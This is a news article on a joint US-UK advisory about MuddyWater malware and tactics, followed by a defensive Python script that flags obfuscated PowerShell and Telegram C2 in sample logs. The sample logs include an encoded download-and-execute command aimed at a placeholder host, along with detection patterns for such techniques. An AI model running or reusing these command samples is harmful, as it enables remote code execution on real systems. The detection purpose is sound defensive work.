Cybersecurity agencies in the U.K. and the U.S. have revealed a new set of malware used in attacks against government and commercial networks around the world by an Iranian government-sponsored advanced persistent threat (APT) group.
“MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors,” the agencies said.
The joint advisory comes courtesy of the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the U.K.’s National Cyber Security Centre (NCSC).
Earlier this year, the cyberespionage actors were exposed as operating within Iran’s Ministry of Intelligence and Security (MOIS). They have targeted a broad range of public and private sector organizations, including defense and telecommunications.
MuddyWater is also tracked by the wider cybersecurity community under the names Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros, with the group known for cyber offensives in support of MOIS objectives since roughly 2018.
In addition to exploiting publicly known vulnerabilities, the group has historically been seen using open-source tools to access sensitive data, deploy ransomware, and maintain persistence on victim networks.
A follow-on investigation by Cisco Talos late last month also uncovered a previously undocumented malware campaign aimed at Turkish private organizations and governmental institutions with the goal of deploying a PowerShell-based backdoor.
The new activities unmasked by the intelligence authorities are no different in that they make use of obfuscated PowerShell scripts to conceal the most damaging parts of the attacks, including command-and-control (C2) functions.
The intrusions are facilitated via a spear-phishing campaign that attempts to coax targets into downloading suspicious ZIP archives containing either an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious payload onto the infected system.
“Additionally, the group uses multiple malware sets — PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS — to load malware, backdoor access, persistence, and exfiltration,” FBI, CISA, CNMF, and NCSC stated.
While PowGoop functions as a loader responsible for downloading second-stage PowerShell scripts, Small Sieve is described as a Python-based implant used for maintaining a foothold in the network, leveraging the Telegram API for C2 communications to evade detection.
Other key pieces of malware are Canopy, a Windows Script File (.WSF) used to collect and transmit system metadata to an adversary-controlled IP address, and two backdoors called Mori and POWERSTATS that are used to run commands received from the C2 and maintain persistent access.
On top of that, MuddyWater has employed a survey script to enumerate information about victim computers, which is then sent back to the remote C2 server. A newly identified PowerShell backdoor deployed by MuddyWater is used to execute commands sent by the attackers.
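As an added illustration of how a defender might hunt for the tradecraft described above (obfuscated PowerShell and Telegram-API C2), the following Python script, which is not from the advisory or the agencies, scores constructed script-block log lines against a few indicators; the log lines, the placeholder URLs and the bot token are all made up.

```python
import base64
import re

# Constructed sample PowerShell script-block log lines (Event ID 4104 style),
# not taken from the advisory; they imitate the tradecraft the article describes.
SAMPLE_LOGS = [
    "4104 powershell.exe ScriptBlockText: Get-ChildItem C:\\Users -Recurse",
    "4104 powershell.exe ScriptBlockText: powershell -w hidden -nop -EncodedCommand "
    + base64.b64encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/s.ps1')"
        .encode("utf-16le")).decode(),
    "4104 wscript.exe ScriptBlockText: $b=[char]73+[char]69+[char]88;&$b (Get-Content C:\\temp\\loader.ps1 -Raw)",
    "4104 powershell.exe ScriptBlockText: Invoke-RestMethod https://api.telegram.org/botPLACEHOLDER/getUpdates",
]

# Indicators: base64-encoded command, [char]-code string building, hidden window, Telegram bot API.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
CHAR_CONCAT = re.compile(r"(\[char\]\d+\s*\+\s*){2,}", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
TELEGRAM_API = re.compile(r"api\.telegram\.org/bot", re.I)

def decode_encoded_command(blob):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE text) for inspection."""
    try:
        return base64.b64decode(blob).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""

def analyze(line):
    """Return the list of indicator names matched in one script-block log line."""
    hits = []
    m = ENCODED_FLAG.search(line)
    if m:
        hits.append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
        # Look inside the decoded payload for download-and-execute primitives.
        if re.search(r"DownloadString|DownloadFile|IEX|Invoke-Expression", decoded, re.I):
            hits.append("download_and_execute")
    if CHAR_CONCAT.search(line):
        hits.append("char_code_obfuscation")
    if HIDDEN_WINDOW.search(line):
        hits.append("hidden_window")
    if TELEGRAM_API.search(line):
        hits.append("telegram_api_c2")
    return hits

def triage(lines):
    """Map the index of each suspicious line to its indicators; clean lines are omitted."""
    return {i: h for i, h in ((i, analyze(l)) for i, l in enumerate(lines)) if h}

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_LOGS).items():
        print(idx, hits)
```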
To create barriers against such attacks, the agencies recommend that organizations use multi-factor authentication wherever applicable, limit the use of administrator privileges, implement phishing protections, and prioritize patching known exploited vulnerabilities.